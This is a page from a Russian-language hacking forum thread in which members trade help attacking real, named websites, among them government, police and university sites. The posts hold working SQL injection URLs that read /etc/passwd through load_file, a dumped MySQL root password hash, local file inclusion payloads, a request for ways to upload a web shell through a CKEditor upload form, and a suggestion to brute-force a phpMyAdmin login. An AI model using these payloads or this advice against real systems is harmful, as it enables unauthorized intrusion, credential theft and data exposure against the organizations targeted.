HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1461  
Старый 05.11.2016, 17:43
qqq1457
Guest
Сообщений: n/a
Провел на форуме:
8589

Репутация: 0
По умолчанию

Цитата:
Сообщение от DezMond™  
DezMond™ said:

http://gwps.org/36.0.html?&action=showDetails&showid=72
Как раскрутить? как слепая тоже не крутиться(
Таблица be_users колонка usename
Немогу данные выковырять
havij видит что то http://prnt.sc/d3e4kj

но увы mysql=4.0.27

в ручную пока не могу составить запрос
 
Ответить с цитированием

  #1462  
Старый 05.11.2016, 17:47
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Цитата:
Сообщение от qqq1457  
qqq1457 said:

1
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission'+and+false+Un ioN+SeLect+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12--+
или
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission'+and+false+Un ioN+SeLect+1,load_file(0x2F6574632F706173737764),3 ,4,5,6,7,8,9,10,11,12--+
где 0x2F6574632F706173737764= hex(/etc/passwd)
2
нет доступа к mysql.user то есть нет возможности прочитать файл,несмотря на то что пользователь root, root'ом не является
http://www.naval.iitkgp.ernet.in/me...rd),3,4,5,6,7,8,9,10,11,12+from+mysql.user--+

root:*29EAFC3EEB29D66A3630CAA03C557B3083B2975B

всё там нормально
 
Ответить с цитированием

  #1463  
Старый 05.11.2016, 17:50
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Цитата:
Сообщение от qqq1457  
qqq1457 said:

havij видит что то
http://prnt.sc/d3e4kj
но увы mysql=4.0.27
в ручную пока не могу составить запрос
Это я видел. Должен быть вывод....
 
Ответить с цитированием

  #1464  
Старый 05.11.2016, 17:59
qqq1457
Guest
Сообщений: n/a
Провел на форуме:
8589

Репутация: 0
По умолчанию

Цитата:
Сообщение от DezMond™  
я про 2 вариант

http://www.police.gov.bd/Police-act...user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-
 
Ответить с цитированием

  #1465  
Старый 05.11.2016, 18:38
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Спасибо кто откликнулся.

В первом сайте интересен запрос table_name from information_schema.tables where table_name=database()/

в втором сайте интересней чтение файла. Сори а то что сразу не смог задать нормально вопрос.
 
Ответить с цитированием

  #1466  
Старый 08.11.2016, 07:19
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию

Всем привет!

На странице есть ckeditor с возможностью загружать файлы на сервер.

- заливать можно всё

- имена файлов переименовывается, так что залить .htaccess не получится

- имена после заливки известны

- php, php3, phtml (возможно и другие, больше не пробовал, боюсь мою кучу говна скоро обнаружат) не выполняются, скачиваются

- shtml открывается, но так же не выполняется (судя по всему там хрен что выполняется)

Свои идеи иссякли, а останавливаться на достигнутом не хочется, так что прошу поделиться идеями, размышлениями на тему заливки рабочего шелла и т.п. вещей.

Не уверен что с html+js можно что-то придумать, может какой perl сгодится или еще что, но в этом я уже не силен.

Да кстати, хоть ckeditor версии 4.0.1, толку от этого нет, т.к. папка samples отсутствует.

И еще проверил pl, чтоб наверняка, тоже понятное дело скачивается.
 
Ответить с цитированием

  #1467  
Старый 08.11.2016, 09:17
WallHack
Guest
Сообщений: n/a
Провел на форуме:
61136

Репутация: 32
По умолчанию

Помогите раскрутить LFI

_ttp://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=../../../etc/passwd
 
Ответить с цитированием

  #1468  
Старый 08.11.2016, 18:50
ZodiaX
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме:
44902

Репутация: 0
По умолчанию

Цитата:
Сообщение от WallHack  
WallHack said:

Помогите раскрутить LFI
_ttp://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=../../../etc/passwd
?page=file:///etc/passwd
 
Ответить с цитированием

  #1469  
Старый 08.11.2016, 18:58
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от ZodiaX  
ZodiaX said:

?page=file:///etc/passwd
Вроде как указал автор работает. Не очень понятно что требуется
 
Ответить с цитированием

  #1470  
Старый 08.11.2016, 20:13
qqq1457
Guest
Сообщений: n/a
Провел на форуме:
8589

Репутация: 0
По умолчанию

http://lidodo.astro.ncu.edu.tw/phpMyAdmin/index.php есть phpmyadmin можно попробывать пробрутить

версия http://lidodo.astro.ncu.edu.tw/phpMy...tml/index.html
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ